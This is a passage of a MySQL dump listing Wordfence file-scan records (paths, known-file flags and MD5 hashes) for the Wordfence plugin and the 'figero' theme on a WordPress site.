(0xd7e45ecb75a9ade2cb7d9d47bbd41514, 'wp-content/plugins/wordfence/lib/email_unlockRequest.php', 1, 0x00000000000000000000000000000000, 0xb620da45db0632382e11363352baedb8),
(0xd890565c133d106c53a98b6cbf4a9a26, 'wp-content/plugins/wordfence/lib/menuHeader.php', 1, 0x00000000000000000000000000000000, 0x107642a9be705f302aab6b38bf6f470f);
INSERT INTO `www2_wfFileMods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`) VALUES
(0x8e524c5392662cfd4095884c3d10ec2e, 'wp-content/plugins/wordfence/lib/menu_activity.php', 1, 0x00000000000000000000000000000000, 0x4a88d5406bd182261060c5a4abd67274),
(0x80e615f12b0cc2e3a830a6b1c7d8c631, 'wp-content/plugins/wordfence/lib/menu_blockedIPs.php', 1, 0x00000000000000000000000000000000, 0xd444150aae36792158f65409aeda2650),
(0x488760488dc79bef4f2ebaeb56186943, 'wp-content/plugins/wordfence/lib/menu_countryBlocking.php', 1, 0x00000000000000000000000000000000, 0x46062eabb8fbefc83e111bfd21738879),
(0xba574ded8acb7b68a916f8dac0289d9e, 'wp-content/plugins/wordfence/lib/menu_options.php', 1, 0x00000000000000000000000000000000, 0x00742df9779c1306ca5d77480e6d090c),
(0xf34ba3927ab2993dbb47eae1f8f83869, 'wp-content/plugins/wordfence/lib/menu_passwd.php', 1, 0x00000000000000000000000000000000, 0x62eeb4b539065e015c31fdaf6b0d822e),
(0x2d3e0bfbea5dd4cd1bb50c326ab4b7d5, 'wp-content/plugins/wordfence/lib/menu_rangeBlocking.php', 1, 0x00000000000000000000000000000000, 0xb2bb1469cedcafb7eb141a10923199a1),
(0xb336630f491dfb0940db9e6f8eeef3e4, 'wp-content/plugins/wordfence/lib/menu_scan.php', 1, 0x00000000000000000000000000000000, 0xade3f73f929f2bad57dc4710f352127c),
(0xe2202af173135ce14f93e910690f6cea, 'wp-content/plugins/wordfence/lib/menu_scanSchedule.php', 1, 0x00000000000000000000000000000000, 0x7179aa6299e9a5e51de18c31f488bc73),
(0xe07ca4f31942bffdc7e9e33559931be8, 'wp-content/plugins/wordfence/lib/menu_sitePerf.php', 1, 0x00000000000000000000000000000000, 0xcdbf228ee3783cf3250ff9e2932bf534),
(0xe141160921669059eb6a3d0971517c48, 'wp-content/plugins/wordfence/lib/menu_sitePerfStats.php', 1, 0x00000000000000000000000000000000, 0x302701ba2bea48d6c10988a199a36922),
(0x938a6ee0aaee34b1db86c47802f280ce, 'wp-content/plugins/wordfence/lib/menu_twoFactor.php', 1, 0x00000000000000000000000000000000, 0x8ab54a8b6553e2685b811a5dd48ad480),
(0x0697c58aeb60f637a7fe54ea17b30361, 'wp-content/plugins/wordfence/lib/menu_whois.php', 1, 0x00000000000000000000000000000000, 0x26963aa91784ff6f8f751eec292f6e36),
(0x9d23f5f43ee4ab08ed9112d286c34b6c, 'wp-content/plugins/wordfence/lib/pageTitle.php', 1, 0x00000000000000000000000000000000, 0xe54812689249afe68d2153d93f3f106b),
(0x7ed3a4c377ec4accbc0384bf07a12ef9, 'wp-content/plugins/wordfence/lib/schedWeekEntry.php', 1, 0x00000000000000000000000000000000, 0x44d431bf0444319f9fc5e6b9e4202e56),
(0xa3dc0346a6b2998d987b0f90ecb4fd41, 'wp-content/plugins/wordfence/lib/sysinfo.php', 1, 0x00000000000000000000000000000000, 0x03d6a4bc438dbcbf43a857f9c1d94d1a),
(0xff87b7d64d7e0404eb5e78f9bc3b87f0, 'wp-content/plugins/wordfence/lib/unknownFiles.php', 1, 0x00000000000000000000000000000000, 0x41d17bd1c9ee1055c0ead07aa45b8ad8),
(0x4c52023751bce416546f08477cc41e7b, 'wp-content/plugins/wordfence/lib/viewFullActivityLog.php', 1, 0x00000000000000000000000000000000, 0xfcd8a4bd3df0f812c9f1aa1710b36f6c),
(0xc1d9b50a68b6cd4a78b56476cfd4835d, 'wp-content/plugins/wordfence/lib/wf503.php', 1, 0x00000000000000000000000000000000, 0x908fb144f81b47b1db155c34ca2ac694),
(0xbee132185d6871753ade543645d155b6, 'wp-content/plugins/wordfence/lib/wfAPI.php', 1, 0x00000000000000000000000000000000, 0x485571ad70838f0d8ba48e4cb3d978ba),
(0x0e1523e796addbadaa76220bfe974dbc, 'wp-content/plugins/wordfence/lib/wfAction.php', 1, 0x00000000000000000000000000000000, 0x40e292d35f05cfedad85f2b5c93e6a73),
(0xc98638a8c2d6c070c5bbd1b5020756fd, 'wp-content/plugins/wordfence/lib/wfActivityReport.php', 1, 0x00000000000000000000000000000000, 0xada0528b24cd81cb4efcca4464469cb6),
(0xdede8b19b3ad94310446f3f8ebdb6193, 'wp-content/plugins/wordfence/lib/wfArray.php', 1, 0x00000000000000000000000000000000, 0x13fada65a66d79b88656f44dbc1aacba),
(0x1cea2d3d5115b04377e0746e4ce0a123, 'wp-content/plugins/wordfence/lib/wfBrowscap.php', 1, 0x00000000000000000000000000000000, 0x80e4510f3f53586c86b534b65af5113e),
(0xab17d0e8125890920fb0d8024aa0fc70, 'wp-content/plugins/wordfence/lib/wfBrowscapCache.php', 1, 0x00000000000000000000000000000000, 0xf63e3cb187c57ccb7219471fff3c67fd),
(0xe4ea1fbf31fe5dc34d7cae4b1dd4465a, 'wp-content/plugins/wordfence/lib/wfBulkCountries.php', 1, 0x00000000000000000000000000000000, 0x1f7ddac3ec084dec8ab1a2b3f25f2339),
(0x1090b89cd2912de8ccf48a0d8a7b2cef, 'wp-content/plugins/wordfence/lib/wfCache.php', 1, 0x00000000000000000000000000000000, 0x5804a7490999bf0ff73d5cb5a788a199),
(0x5a34063c6e3f7f6598f11308b2198d8f, 'wp-content/plugins/wordfence/lib/wfConfig.php', 1, 0x00000000000000000000000000000000, 0x5a14139f21f057b0cb17a808b6ae22c0),
(0xb2fd8d4203b904365b738f964df77f18, 'wp-content/plugins/wordfence/lib/wfCountryMap.php', 1, 0x00000000000000000000000000000000, 0x5d68461f9333c7d00bac6bdd3b03b475),
(0x38c39b5a459151247d185550f654a3e0, 'wp-content/plugins/wordfence/lib/wfCrawl.php', 1, 0x00000000000000000000000000000000, 0xace40d230151120e10716fe17d763992),
(0xd878bcf8ceb2d0a6ace0a841098a3cea, 'wp-content/plugins/wordfence/lib/wfCrypt.php', 1, 0x00000000000000000000000000000000, 0x9ca9c157b4ed6b7cb8d329fec192342b),
(0xd94ae01cef9a5e1a37fc957547966b2b, 'wp-content/plugins/wordfence/lib/wfDB.php', 1, 0x00000000000000000000000000000000, 0xf304fe8cd42479bfa427bf5aeac24e23),
(0xf546a4eb1ac193e71eae43fcec31ae50, 'wp-content/plugins/wordfence/lib/wfDict.php', 1, 0x00000000000000000000000000000000, 0x052a90ee1736411c7474ebe623c31314),
(0xbaedcc4130668efd6660c2204bc7817d, 'wp-content/plugins/wordfence/lib/wfDirectoryIterator.php', 1, 0x00000000000000000000000000000000, 0x1a8c82d1e9f8462501cbe5bfc7e0917c),
(0x3d1e391e299c911ead29c25c1fd51596, 'wp-content/plugins/wordfence/lib/wfGeoIP.php', 1, 0x00000000000000000000000000000000, 0xa34a8e9d1c5c1b7ddfde7add59258151),
(0x50c64dee1ad649ccb88d10ddad596072, 'wp-content/plugins/wordfence/lib/wfHelperString.php', 1, 0x00000000000000000000000000000000, 0xa14f5688466144118e56de349834dcaa),
(0xd36a7313a49e7732f9ec1270aefd7153, 'wp-content/plugins/wordfence/lib/wfIssues.php', 1, 0x00000000000000000000000000000000, 0x399e9403998f65b2d206a1e0ae6b3764),
(0xf38ad8a05dd4669588f050f4a2860483, 'wp-content/plugins/wordfence/lib/wfLockedOut.php', 1, 0x00000000000000000000000000000000, 0xdddb57d1b1d458f1b2652044a3c0189a),
(0xf2da77ce2b07222bfa24e319ac5e1cb8, 'wp-content/plugins/wordfence/lib/wfLog.php', 1, 0x00000000000000000000000000000000, 0x6f1a8c68cd15332f126ff8276c6701d8),
(0x7f5e6bbfd6aa44760e07053605975290, 'wp-content/plugins/wordfence/lib/wfRate.php', 1, 0x00000000000000000000000000000000, 0x1ed3b2accb3aa5275f17fed90b151747),
(0xefde8c742be95cf52bc65861865a551b, 'wp-content/plugins/wordfence/lib/wfScan.php', 1, 0x00000000000000000000000000000000, 0xd91167e3c42eada6c60d532216fc3ba6),
(0xefef365887d4aa34f1e35b5f879d3d74, 'wp-content/plugins/wordfence/lib/wfScanEngine.php', 1, 0x00000000000000000000000000000000, 0x94b1f9657bf6c5b3049fd6fc78dae999),
(0x62ca03a5f1487a665798a085ad67779b, 'wp-content/plugins/wordfence/lib/wfSchema.php', 1, 0x00000000000000000000000000000000, 0x09af6ea9f25e01e400a02ea1467db1a0),
(0x9aea8a688b4c8dbcb24a48ff58230e30, 'wp-content/plugins/wordfence/lib/wfUnlockMsg.php', 1, 0x00000000000000000000000000000000, 0x15cfa541bab45d51b421793e10c94059),
(0x89aa65c45cabd431e174c68bdc3c0984, 'wp-content/plugins/wordfence/lib/wfUpdateCheck.php', 1, 0x00000000000000000000000000000000, 0x20973b6aac74b672a2fe9fe6ec5b1063),
(0xa8511808340439e3f31e4c7ad3144ab5, 'wp-content/plugins/wordfence/lib/wfUtils.php', 1, 0x00000000000000000000000000000000, 0x06f96b7a21346d4399be8be99b6c2bd0),
(0xe565c590c2faf4fcfd6e03b7859f41db, 'wp-content/plugins/wordfence/lib/wfView.php', 1, 0x00000000000000000000000000000000, 0xe7ab239392287cb7ded3e441457cc488),
(0xaacbd9767b43abc0baced2a7808e3449, 'wp-content/plugins/wordfence/lib/wfViewResult.php', 1, 0x00000000000000000000000000000000, 0x09714e0bc1ecba4b383019c14fabb71d),
(0x0fc7dda13dbdbd4e7817bc874bd4602a, 'wp-content/plugins/wordfence/lib/wordfenceClass.php', 1, 0x00000000000000000000000000000000, 0xfb71a821d399ba088940291b96540c88),
(0xc16b486de531d30ef36030d1b9af965f, 'wp-content/plugins/wordfence/lib/wordfenceConstants.php', 1, 0x00000000000000000000000000000000, 0x6914ed8783cf1da443dafdb0e521ac30),
(0x81d558f9e2cfe02d9f34a44afc5f8333, 'wp-content/plugins/wordfence/lib/wordfenceHash.php', 1, 0x00000000000000000000000000000000, 0xdd696a045badfc5a833c8c52cf3622b9),
(0x1c7a987c2a369e19535c0235b7e3af33, 'wp-content/plugins/wordfence/lib/wordfenceScanner.php', 1, 0x00000000000000000000000000000000, 0xdc15d7aa60e5daa99231fcf6b803e7e6),
(0x68bb3cb25d9394ec4f704e4305c6b4e6, 'wp-content/plugins/wordfence/lib/wordfenceURLHoover.php', 1, 0x00000000000000000000000000000000, 0x76cd234171274989624f0fb5f276b844),
(0xbf76e997464997cb3268b4cff8a46ec1, 'wp-content/plugins/wordfence/readme.txt', 1, 0x00000000000000000000000000000000, 0x453713fee52b5c37791a6604e317261c),
(0xef3b0c4ce17489d7ac43b0839094c9a3, 'wp-content/plugins/wordfence/tmp/.htaccess', 1, 0x00000000000000000000000000000000, 0xb749a07a7ed269b62c1b4c9effe81e04),
(0x8ebb4757ff10b76086e74c688d3b908d, 'wp-content/plugins/wordfence/tmp/configCache.php', 0, 0xc3b80753e7452f6ac1342ef77b30b79b, 0xc3b80753e7452f6ac1342ef77b30b79b),
(0x543f843f3a71d7ae50c3f3616827abab, 'wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php', 1, 0x00000000000000000000000000000000, 0x320ec877fc4a8b1bc36552a57d1c02b9),
(0x05488393ca0c63e5c1a449b24a25b548, 'wp-content/plugins/wordfence/views/reports/activity-report-email.php', 1, 0x00000000000000000000000000000000, 0x25d898fd6f8e879ac6a8e03cb85160b5),
(0x1f4ea1642352ad872babc1720073045b, 'wp-content/plugins/wordfence/views/reports/activity-report.php', 1, 0x00000000000000000000000000000000, 0xa50f92c82e02c94f44e9b048af69f7ee),
(0x4523cdd5e72d7633371903d936ebc5a4, 'wp-content/plugins/wordfence/wordfence.php', 1, 0x00000000000000000000000000000000, 0xb12512a91ff4f6a183305aa07b5c04ed),
(0xecf2b86368ff9defc26ddaede4bec3f8, 'wp-content/themes/figero/404.php', 1, 0x00000000000000000000000000000000, 0xa28e40b6aaf3ef59bac8e3a185aca5eb),
(0x703dc48e1c876d383c8895d10880a3b1, 'wp-content/themes/figero/_style.css', 0, 0x32121e9d315beaa023fd15c09245acff, 0x32121e9d315beaa023fd15c09245acff),
(0xd8dbea4fee20410ba00ad54fce07aa4a, 'wp-content/themes/figero/archive.php', 1, 0x00000000000000000000000000000000, 0x3fb44cd9679d89e4e7264eeb16d0e10a),
(0xcb7ad6fec6fac651d8b827aefe05ffb8, 'wp-content/themes/figero/author.php', 1, 0x00000000000000000000000000000000, 0x483c8af3a4445c889005229da7dda6aa),
(0x235e642611e5387ef3b8720d9503ca02, 'wp-content/themes/figero/blog.php', 1, 0x00000000000000000000000000000000, 0x8f111421d0e8823d917050375e983489),
(0xa047dfda3c226f0dd006b74f5c3a5c6c, 'wp-content/themes/figero/category.php', 1, 0x00000000000000000000000000000000, 0x3dd67af5df4a6ad7231510d92e5ae9be),
(0xaacbb2b2c42c8cb024b99ba79162f4e5, 'wp-content/themes/figero/changelog.txt', 1, 0x00000000000000000000000000000000, 0xb6b0da507e0b3ee5bbc21d37903f8ffb),
(0x1fb507efc1b5b8a2b607ec3a5f1aa8ef, 'wp-content/themes/figero/comments.php', 1, 0x00000000000000000000000000000000, 0x62facb9609ecbc013475e89ec1fc8304),
(0x0278143f8f0b76386308d4f2e6083610, 'wp-content/themes/figero/css/960_24_col.css', 1, 0x00000000000000000000000000000000, 0x83e79d4065a3da2d4c35434293ab6a7f),
(0xfe22facbce7dc6c14b176e5d1e1b353c, 'wp-content/themes/figero/css/reset.css', 1, 0x00000000000000000000000000000000, 0x4d24e1653dfaaad40cce840ea33e2847),
(0x66ea9d8304f0a43cfc9251037acb5a08, 'wp-content/themes/figero/editor-style.css', 1, 0x00000000000000000000000000000000, 0x3978f2d4ae34a7da712aa3b7218b902b),
(0xa2f6520cbc01bf459f4aa7aed41a8be3, 'wp-content/themes/figero/footer.php', 0, 0x00a371ce899aeef5b3a5d0c10d99deec, 0x00a371ce899aeef5b3a5d0c10d99deec),
(0x46d002358af6e1231db421af18ec3945, 'wp-content/themes/figero/front-page.php', 0, 0x8c1289de6f55920dd4075266b243caeb, 0x8c1289de6f55920dd4075266b243caeb),
(0x5a64fcf6e10e07001f199e59db8f4f4c, 'wp-content/themes/figero/functions/admin-functions.php', 1, 0x00000000000000000000000000000000, 0x33d9ce3553defcdb322221390bf1b0b8),
(0x7d15faf5c9bc5363e09ff7e9e8801e6c, 'wp-content/themes/figero/functions/admin-interface.php', 1, 0x00000000000000000000000000000000, 0x8404ebe37c30e6f5dff1e38293615ac1),
(0xa6552d0eb00278cd83c643e2c281d8b6, 'wp-content/themes/figero/functions/admin-style.css', 1, 0x00000000000000000000000000000000, 0x660f821021fb25bdcc18583528baa689),
(0x66c9e6e6e32c92b1dc94d920472c4e32, 'wp-content/themes/figero/functions/css/colorpicker.css', 1, 0x00000000000000000000000000000000, 0x93b007836cafea87253f845c5c360e64),
(0xa58412b39719170d0506933bc77dfd5c, 'wp-content/themes/figero/functions/figero-functions.php', 1, 0x00000000000000000000000000000000, 0xa2006b2969b9745f86b2aec7bda8a4c9),
(0x26b8ccf68e6757b169f66f5adc1d6b1b, 'wp-content/themes/figero/functions/images/2cl.png', 1, 0x00000000000000000000000000000000, 0x6d309b5032c6981e7f0f947b014efaf7),
(0xcd9a50a6a7d1a712043307597216207e, 'wp-content/themes/figero/functions/images/2cr.png', 1, 0x00000000000000000000000000000000, 0x8236f70c466b02601d9b9357467d0735),
(0x2071b0da49ae8a944da93aa71719030d, 'wp-content/themes/figero/functions/images/3cm.png', 1, 0x00000000000000000000000000000000, 0x336290ffeb0804c86ae7e2eb9346adab),
(0xefe05ff4dc48a69130b50272b89e5c11, 'wp-content/themes/figero/functions/images/3cr.png', 1, 0x00000000000000000000000000000000, 0x01eaaf0c119937bb69edd4518b3a7335),
(0x8dc60225c8239dc744e3c4a0ad03b68b, 'wp-content/themes/figero/functions/images/accept.png', 1, 0x00000000000000000000000000000000, 0xb1225bb3ee3bde028fd50a9b962288ef),
(0x60d10acbcebee53108cb24718a045125, 'wp-content/themes/figero/functions/images/andrina.png', 1, 0x00000000000000000000000000000000, 0x8cd98715a0632f6cfd926a8747d36238),
(0xcbc10d66e48b55326758edf721205bea, 'wp-content/themes/figero/functions/images/cloriato.jpg', 1, 0x00000000000000000000000000000000, 0x816bee2c696e3dc61129d883eff96c83),
(0x7ecf4ef0001ea4459ce29368248e1a0b, 'wp-content/themes/figero/functions/images/colorpicker/blank.gif', 1, 0x00000000000000000000000000000000, 0xd60a1cb0e1e9b9a8abc64214bb749a55),
(0x8943073fe55e9d974f48f0680e5d9104, 'wp-content/themes/figero/functions/images/colorpicker/colorpicker_background.png', 1, 0x00000000000000000000000000000000, 0xa79f1a2a81bfe3ed1c2ca4c41b8e1fbf),
(0x1e3be7011314882754fb0a2ee5d43406, 'wp-content/themes/figero/functions/images/colorpicker/colorpicker_hex.png', 1, 0x00000000000000000000000000000000, 0x16d6870c36e379c06fb26ebd2e16bf44),
(0x7a5e77942d3df2974a0f5de09412eedf, 'wp-content/themes/figero/functions/images/colorpicker/colorpicker_hsb_b.png', 1, 0x00000000000000000000000000000000, 0x2be4e81b4a5c98674abe6fc60b447e9a),
(0xb9f74d85112e5f9e323312c661cbdfd8, 'wp-content/themes/figero/functions/images/colorpicker/colorpicker_hsb_h.png', 1, 0x00000000000000000000000000000000, 0xd47409a203bedc76b26dc60b71a69f6b),
(0xd28ae462c44ac9001eb4e5964e71fa88, 'wp-content/themes/figero/functions/images/colorpicker/colorpicker_hsb_s.png', 1, 0x00000000000000000000000000000000, 0x5ff5e43ab6b7b41b6123bfab692a9b19),
(0x015756f4766ed3cfdc86c04dde68e569, 'wp-content/themes/figero/functions/images/colorpicker/colorpicker_indic.gif', 1, 0x00000000000000000000000000000000, 0xf485d07540a89502e36dc1a55cec05d0),
(0x4faacf9d288ee7d4715b8e28e0d1c17c, 'wp-content/themes/figero/functions/images/colorpicker/colorpicker_overlay.png', 1, 0x00000000000000000000000000000000, 0xc7a33805ffda0d32bd2a9904c8b02750),
(0xc9f20bd99c3f36527b322b742f0df972, 'wp-content/themes/figero/functions/images/colorpicker/colorpicker_rgb_b.png', 1, 0x00000000000000000000000000000000, 0x2be4e81b4a5c98674abe6fc60b447e9a),
(0xe8be895603c2cbe8ec416471bd5a6e20, 'wp-content/themes/figero/functions/images/colorpicker/colorpicker_rgb_g.png', 1, 0x00000000000000000000000000000000, 0xdc17f953a6febbe174e92b54690586c3),
(0x43283fac96bd0ef8bacd6262509d67f8, 'wp-content/themes/figero/functions/images/colorpicker/colorpicker_rgb_r.png', 1, 0x00000000000000000000000000000000, 0x87eeb205d093b713b68a341771f4ee27),
(0x33e24ba97e27f3fbf3e23ee6315c5bb0, 'wp-content/themes/figero/functions/images/colorpicker/colorpicker_select.gif', 1, 0x00000000000000000000000000000000, 0xcec464162af0cce10348e7bb7701ef86),
(0xc77d4c004f6f30f71ccaf44e60ad0cca, 'wp-content/themes/figero/functions/images/colorpicker/colorpicker_submit.png', 1, 0x00000000000000000000000000000000, 0x12d1746e6b52e007f1b78d772d9248ba),
(0x7e3b4d741cd4192e83a0cba02c1991dc, 'wp-content/themes/figero/functions/images/colorpicker/select.png', 1, 0x00000000000000000000000000000000, 0xe88aeeb3bfac6ed9a684a0a43fdc88c4),
(0x808026967c409f12d6ea4e1926c12448, 'wp-content/themes/figero/functions/images/colorway.jpg', 1, 0x00000000000000000000000000000000, 0x1256774cb2b2d4095039c5105eac7bc3),
(0x0c43bf13df47f549743320d6cf0d3711, 'wp-content/themes/figero/functions/images/dzonia.jpg', 1, 0x00000000000000000000000000000000, 0xc640a65914e0f7797bcf13b6a46d8c85),
(0xa9acbfb8bbe1b8cfaeaee091e786452e, 'wp-content/themes/figero/functions/images/favicon.ico', 1, 0x00000000000000000000000000000000, 0xa2dec47a071074d1fd4e7309c408479c),
(0xdde41b075dacc3a8c50fb4541bae3585, 'wp-content/themes/figero/functions/images/ico-close.png', 1, 0x00000000000000000000000000000000, 0xca91c143a98eb512fa961ab1f0bdd1f0),
(0xe6a7b451a6ecacd6a19dbb5b994887b6, 'wp-content/themes/figero/functions/images/ico-docs.png', 1, 0x00000000000000000000000000000000, 0xbe967fd561ee3a034949f9e691729b9c),
(0x33855f989b7bb6f003ce54a2c4165d2f, 'wp-content/themes/figero/functions/images/icon-add.png', 1, 0x00000000000000000000000000000000, 0x1988c3cc1384a3ac9b9a4129183248f3),
(0x38c367f00f0d1d0809e492685c615d85, 'wp-content/themes/figero/functions/images/icon-edit.png', 1, 0x00000000000000000000000000000000, 0x97176626eef35c7beb4f05a850325042),
(0xa36647b3574bf4c6ff2042c08576b5c6, 'wp-content/themes/figero/functions/images/icon_option2.png', 1, 0x00000000000000000000000000000000, 0xbb7bf03dd044b11aa1f74dea63415c8b),
(0x113b7c2c50dd5785cb28b0261c997f33, 'wp-content/themes/figero/functions/images/inkthemes-logo.png', 1, 0x00000000000000000000000000000000, 0xbbc6043d4bd28ef1cc99662b350022a6),
(0xc2b7007dd1cadde215acfc6886e317ff, 'wp-content/themes/figero/functions/images/loading-bottom.gif', 1, 0x00000000000000000000000000000000, 0xe87507f98b78b46470a9ad225b9fd26f),
(0xfa59c83c0cb2a290da81cc124458f1d2, 'wp-content/themes/figero/functions/images/logo.png', 1, 0x00000000000000000000000000000000, 0xf4cc5aeb66086df21005368d41eaa642),
(0x2212cb843c8642dee4a4f83cba0135ad, 'wp-content/themes/figero/functions/images/themia.jpg', 1, 0x00000000000000000000000000000000, 0x0c3908c0381ffd47377c6ec07327f0d8),
(0x2a02a62dfbb7de5dbc04c34f7f268ea3, 'wp-content/themes/figero/functions/images/ui-bg_flat_0_aaaaaa_40x100.png', 1, 0x00000000000000000000000000000000, 0x2a44fbdb7360c60122bcf6dcef0387d8),
(0xe8e567a9888d148e1f993fd886dea537, 'wp-content/themes/figero/functions/images/warning.png', 1, 0x00000000000000000000000000000000, 0x52518eb7721ea8209114bd23fdd3e380),
(0x9f87449494a974200a83d05e57d57037, 'wp-content/themes/figero/functions/images/wrench.png', 1, 0x00000000000000000000000000000000, 0x891212eeda066b3aefb5fc0505ee74c0),
(0x1f1b0aa36513b9a1ff4ee39010b16ee0, 'wp-content/themes/figero/functions/js/ajaxupload.js', 1, 0x00000000000000000000000000000000, 0x2cbfc5e7012dac113e1b07e5a19736fd),
(0x1c2cb35f3cbdf78cb8c141b0084012cf, 'wp-content/themes/figero/functions/js/colorpicker.js', 1, 0x00000000000000000000000000000000, 0xb7b867ffc0579bfd61842a2b3f5cb2e1),
(0x94f80373fd264200fb134de277c50862, 'wp-content/themes/figero/functions/js/jquery.maskedinput-1.2.2.js', 1, 0x00000000000000000000000000000000, 0x141409f34e073384c93adb553c28b420),
(0xe98cce660c3c4158e0460c77282a70bf, 'wp-content/themes/figero/functions/js/script.js', 1, 0x00000000000000000000000000000000, 0xce0345032566d2ba43796ce52982c234),
(0xac28dcfb41629fccc54f3b00e067b284, 'wp-content/themes/figero/functions/theme-options.php', 1, 0x00000000000000000000000000000000, 0xaf660fb1627b56cb3a42125143d53b6d),
(0x7de486dd8ffcd9dd00f5889ec767affa, 'wp-content/themes/figero/functions/theme-page-style.css', 1, 0x00000000000000000000000000000000, 0x1562cb4dc1e86033f39abbb7dbd50336),
(0x903f74a7c182fdd8796b7c21c9d2c351, 'wp-content/themes/figero/functions/themes-page.php', 1, 0x00000000000000000000000000000000, 0x9c63647e506818c6566500c1c9522092),
(0x3c5e48160498b10efdab901835bfca5d, 'wp-content/themes/figero/functions.php', 1, 0x00000000000000000000000000000000, 0xbab8093a7672eef51b174649ddc42d0f),
(0x225a423ddc2a60584358b080ca596786, 'wp-content/themes/figero/header.php', 0, 0xa7bd246a6244e60114c774a8e6dacd17, 0xa7bd246a6244e60114c774a8e6dacd17),
(0x205e49363860ac30a7fab90e787a1dac, 'wp-content/themes/figero/images/1211.png', 1, 0x00000000000000000000000000000000, 0xaafdf1830da4e720115e3686b5fa44c8),
(0xb61259207220cbd1e8c9d8b3822bb2d7, 'wp-content/themes/figero/images/12_col.gif', 1, 0x00000000000000000000000000000000, 0xde99722a80cf0f0b6c75ed07e20b3e89),
(0xb4a5ca84a970f2d56768e65240a497f8, 'wp-content/themes/figero/images/16_col.gif', 1, 0x00000000000000000000000000000000, 0xa1979801ea5e984ba89ca43ab6e9ee49),
(0xb496f1912cb59d8a093f961b8b8f1974, 'wp-content/themes/figero/images/2.png', 1, 0x00000000000000000000000000000000, 0xf79322dcaeb9e931d15d143426ff8912),
(0x4fa3fd42792ac1c893a9f1e55d0cb3c5, 'wp-content/themes/figero/images/24_col.gif', 1, 0x00000000000000000000000000000000, 0x822e5ffc9d0a63a0b58fc64514d0f798),
(0x301633d4a2650c6d1f54c204938e78ac, 'wp-content/themes/figero/images/5.png', 1, 0x00000000000000000000000000000000, 0x46a495d7089f79555c39a08936361e6f),
(0x7de4a883f3dea30e586ce6a83a4f5e77, 'wp-content/themes/figero/images/6.png', 1, 0x00000000000000000000000000000000, 0xb92a6a999949fff8f2537b9b50f27d60),
(0x73945cd80c18afa590dd640f8547d002, 'wp-content/themes/figero/images/7.png', 1, 0x00000000000000000000000000000000, 0xeb37ed71b03bc32d925bd68eea735c5e),
(0x1ebae5697bc8dcf347ecb1fd125845d2, 'wp-content/themes/figero/images/SMS.png', 1, 0x00000000000000000000000000000000, 0x9a86476827b56348d992e2584cd0cd6e),
(0x740c9d13a495f2fc9b85cbd05462bb57, 'wp-content/themes/figero/images/arrows.png', 1, 0x00000000000000000000000000000000, 0x7efd89773fbb1467ec358b56b77c2393),
(0x5f565481b2279f81a0598186f228ccc3, 'wp-content/themes/figero/images/backg2.png', 1, 0x00000000000000000000000000000000, 0x0c4a4633ea5d8f6d095997ebd0495397),
(0x9f7f1a1cf878a2dba9b0637606378a04, 'wp-content/themes/figero/images/background.png', 1, 0x00000000000000000000000000000000, 0xda60856b028863ded0b742f576824ab6),
(0xacc2fbb08f1069075067ee9a7dd17f13, 'wp-content/themes/figero/images/black-bg.png', 1, 0x00000000000000000000000000000000, 0xe7b5e316e18b5fadd31690f2d0dc521b),
(0x651bb95f2a5aeb5a5c217b198a62d2d3, 'wp-content/themes/figero/images/blank.png', 1, 0x00000000000000000000000000000000, 0x737358b32753478672db7e6b915b1784),
(0x648ec0019ac146a0111af3af2f0a9916, 'wp-content/themes/figero/images/blockqoute.png', 1, 0x00000000000000000000000000000000, 0xae07f03962d785cdfd1df7c25c66983d),
(0x154dd3e877b9b8f7b24168a79520dff0, 'wp-content/themes/figero/images/blog-list-img.png', 1, 0x00000000000000000000000000000000, 0x2fe6476a11485b189f1e4e1c9b533d76),
(0x5c4947031ae60ab4fd99cba55a52511e, 'wp-content/themes/figero/images/blog-list-inner-img.png', 1, 0x00000000000000000000000000000000, 0x7d72cc52ef16a4335364dff145286410),
(0x11cfd26aa17f8fa0e5233e03850de0dc, 'wp-content/themes/figero/images/blog-sidelist-img.png', 1, 0x00000000000000000000000000000000, 0xa7f00fda392e3014642ac8a00d55fc3d),
(0xc5e53dc49f5f7b53d367ab72f9d206a6, 'wp-content/themes/figero/images/blog-strip.png', 1, 0x00000000000000000000000000000000, 0x85100de1f693668aefdb433440c3b7b1),
(0xe97d1aa3ebc721d2de1ca3236285a0f7, 'wp-content/themes/figero/images/bottom-footer-blue.png', 1, 0x00000000000000000000000000000000, 0xb2651fa239a68b8e72db5e4687619529),
(0x1de40e65377dd997c006cc1f4631d674, 'wp-content/themes/figero/images/bottom-footer-brown.png', 1, 0x00000000000000000000000000000000, 0x5eeb02e25e6f648dbb2ead66e55e1cb8),
(0x50981a4b432ac69b213cd1b63ff3524c, 'wp-content/themes/figero/images/bottom-footer.png', 1, 0x00000000000000000000000000000000, 0xa78c4ba05d111e30f62d5d6e92cdb0bb),
(0x849a5c720f707fa913d8b0beea79a570, 'wp-content/themes/figero/images/box-background.png', 1, 0x00000000000000000000000000000000, 0x5b983eb64d94917b9a1d996d9cca9f5d),
(0x04bdd1fcbd92dfca8b2214a21c3f85fa, 'wp-content/themes/figero/images/boxbg.png', 1, 0x00000000000000000000000000000000, 0x60790708fe13821a63e33a27f5d602d9),
(0xf56cf47e83e708201560e5449282741b, 'wp-content/themes/figero/images/bt-submit-end (1).png', 1, 0x00000000000000000000000000000000, 0x325b4c26cdd621b79a5c383d8183b4bd),
(0x2b3d0e2b52fdeb9f63a20cbcb4e5d602, 'wp-content/themes/figero/images/bt-submit-end.png', 1, 0x00000000000000000000000000000000, 0x325b4c26cdd621b79a5c383d8183b4bd),
(0x8c0330acd4a9a7fcc6c328e27f0a2f10, 'wp-content/themes/figero/images/bt-submit-over.png', 1, 0x00000000000000000000000000000000, 0x3f26a5ed0caf75a51e8cabde7d999079),
(0x77ce6ec9755c82c872feb8e6f5d46eee, 'wp-content/themes/figero/images/bt-submit.png', 1, 0x00000000000000000000000000000000, 0x347c04a35a68d65250e5a3364abbf1ad),
(0x3a5f82f0baeaa84b84a88d7ee5876da3, 'wp-content/themes/figero/images/buttons.png', 1, 0x00000000000000000000000000000000, 0xc0b0b5072c6e1bd145c6a56e0b395e3a),
(0x8f5db5097457c4d9072680e70ce56501, 'wp-content/themes/figero/images/cat-img-1.png', 1, 0x00000000000000000000000000000000, 0x960a7e1e697ca489430f1093068fe845),
(0x500955014cdee03a32685616f1a72bf9, 'wp-content/themes/figero/images/cat-img-2.png', 1, 0x00000000000000000000000000000000, 0x003b54e9fbb926efb44269f4dd2abca5),
